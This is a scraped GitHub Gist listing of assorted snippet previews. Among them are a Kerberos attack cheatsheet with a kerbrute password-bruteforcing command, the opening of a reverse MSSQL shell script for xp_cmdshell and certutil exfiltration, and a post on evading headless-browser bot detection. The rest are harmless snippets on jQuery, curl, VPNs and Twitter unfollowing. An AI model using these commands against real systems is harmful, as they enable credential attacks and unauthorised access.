Skip to content

Instantly share code, notes, and snippets.

Avatar

Aung Khant yehgdotnet

View GitHub Profile
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019
A cheatsheet with commands that can be used to perform kerberos attacks
View kerberos_attacks_cheatsheet.md

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@UniIsland
UniIsland / SimpleHTTPServerWithUpload.py
Created Aug 14, 2012
Simple Python Http Server with Upload
View SimpleHTTPServerWithUpload.py
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""
@xassiz
xassiz / mandros.py
Created Mar 16, 2018
Reverse MSSQL shell
View mandros.py
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@joepie91
joepie91 / vpn.md
Last active Sep 24, 2021
Don't use VPN services.
View vpn.md

Don't use VPN services.

No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.

Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.

  • A Russian translation of this article can be found here, contributed by Timur Demin.
  • A Turkish translation can be found here, contributed by agyild.
  • There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.
@joyrexus
joyrexus / README.md
Last active Sep 23, 2021 — forked from liamcurry/gist:2597326
Vanilla JS equivalents of jQuery methods
View README.md

Sans jQuery

Events

// jQuery
$(document).ready(function() {
  // code
})
@subfuzion
subfuzion / curl.md
Last active Sep 23, 2021
curl POST examples
View curl.md

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

@staaldraad
staaldraad / awk_netstat.sh
Last active Sep 23, 2021
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
View awk_netstat.sh
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
@JamieMason
JamieMason / unfollow.js
Last active Sep 22, 2021
Unfollow everyone on twitter.com
View unfollow.js
// Unfollow everyone on twitter.com, by Jamie Mason (https://twitter.com/fold_left)
// https://gist.github.com/JamieMason/7580315
//
// 1. Go to https://twitter.com/YOUR_USER_NAME/following
// 2. Open the Developer Console. (COMMAND+ALT+I on Mac)
// 3. Paste this into the Developer Console and run it
//
// See this tweet by @jacknotlittle for a video showing you how to do it;
// https://twitter.com/jacknotlittle/status/1387471283525459969
//
View Preventing-Puppeteer-Detection.md

I’m looking for any tips or tricks for making chrome headless mode less detectable. Here is what I’ve done so far:

Set my args as follows:

const run = (async () => {

    const args = [
        '--no-sandbox',
        '--disable-setuid-sandbox',
        '--disable-infobars',
View waybackrobots.py
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)